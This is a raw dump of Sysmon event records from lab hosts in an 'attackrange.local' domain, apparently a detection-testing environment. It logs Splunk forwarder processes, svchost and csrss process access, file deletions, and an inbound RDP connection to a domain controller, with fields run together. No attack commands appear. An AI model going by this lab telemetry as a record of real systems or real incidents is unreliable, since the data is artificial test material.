07:54:27.028{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807961Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:27.028{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807960Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.028{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807959Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:27.028{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807958Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.028{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F533-60EB-8579-00000000D001}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807957Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.028{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F533-60EB-8579-00000000D001}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807956Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.013{0C1E0330-F533-60EB-8579-00000000D001}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:28.866{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=27B48EE4A6B2A2E8BE9B7B40E23743E1,SHA256=3F79816B3640F9D9BF0623891C6945C0D9ED1A614A6221C49B48AD22BB116658,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:28.766{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=817226C51C6543C8E755BF8E7FE496C1,SHA256=60E3E305CFD1DD6AAF9E56FDA89A1694F0389537051BFEE0CFB4C5E45917D58F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808000Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.528{0C1E0330-F534-60EB-8779-00000000D001}20243516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000807999Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.224{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57293-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000807998Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.310{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F534-60EB-8779-00000000D001}2024C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807997Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807996Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:28.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807995Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807994Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:28.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807993Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807992Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:28.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807991Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807990Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:28.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807989Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807988Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.310{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F534-60EB-8779-00000000D001}2024C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807987Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.294{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F534-60EB-8779-00000000D001}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807986Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.295{0C1E0330-F534-60EB-8779-00000000D001}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807985Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.247{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=93142E1342EF9FA9C889B8643DF21FDD,SHA256=9EC1FB52FCDDC69B81EF7A1A8ED4CDB3083915722B58667436AFCEB4015106BB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:20.081{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-61618-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001049688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:28.450{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=35DA5F5B2D9F273039BDFC03DEACB530,SHA256=590E3C91D8411BD84D01C86820176AB530A4C7FED00171CA3BB3D7F2E01D10AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:28.450{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0439134699D232368B70A37C122110DA,SHA256=8847F706C3A3861B29FBD450CF3C0E23B4EFDDC0D3CEDF5ED26748BEE52770C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:29.780{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D0FC47AD2EC1E3DE615681E7C7D8F96,SHA256=22D3D38401F21A4C4ABE35B43F7F55E596574E56FAD0A0F4F137640200346580,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808002Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:29.528{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=25752551721C55C6A8AA2402E9F88F6C,SHA256=B4601D6A47B358E54F5183B0C69385503AB1F3AB541FE8EE3F539079369B0DCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808001Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:29.153{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B9C53EEDF94D4E95A4AAB0A0FD6C3A3,SHA256=A46136480D4040EFAD0B5A64D0A85D45420A97D6FA48979A2890837CBEFF16A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:30.795{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A5405ABA91400865DF651F67F460B8F,SHA256=A92B8482D5EB2CCB9356DCDA9514956FDA7AD2FCA6E8135E75D4B35AC2F6265C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808004Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:30.278{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=201683BC755BB120062E66E73300547C,SHA256=1B987FF22A2458B9473BEBF1076E2C119AB31E013789E5AA188EBF9515AB692E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808003Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 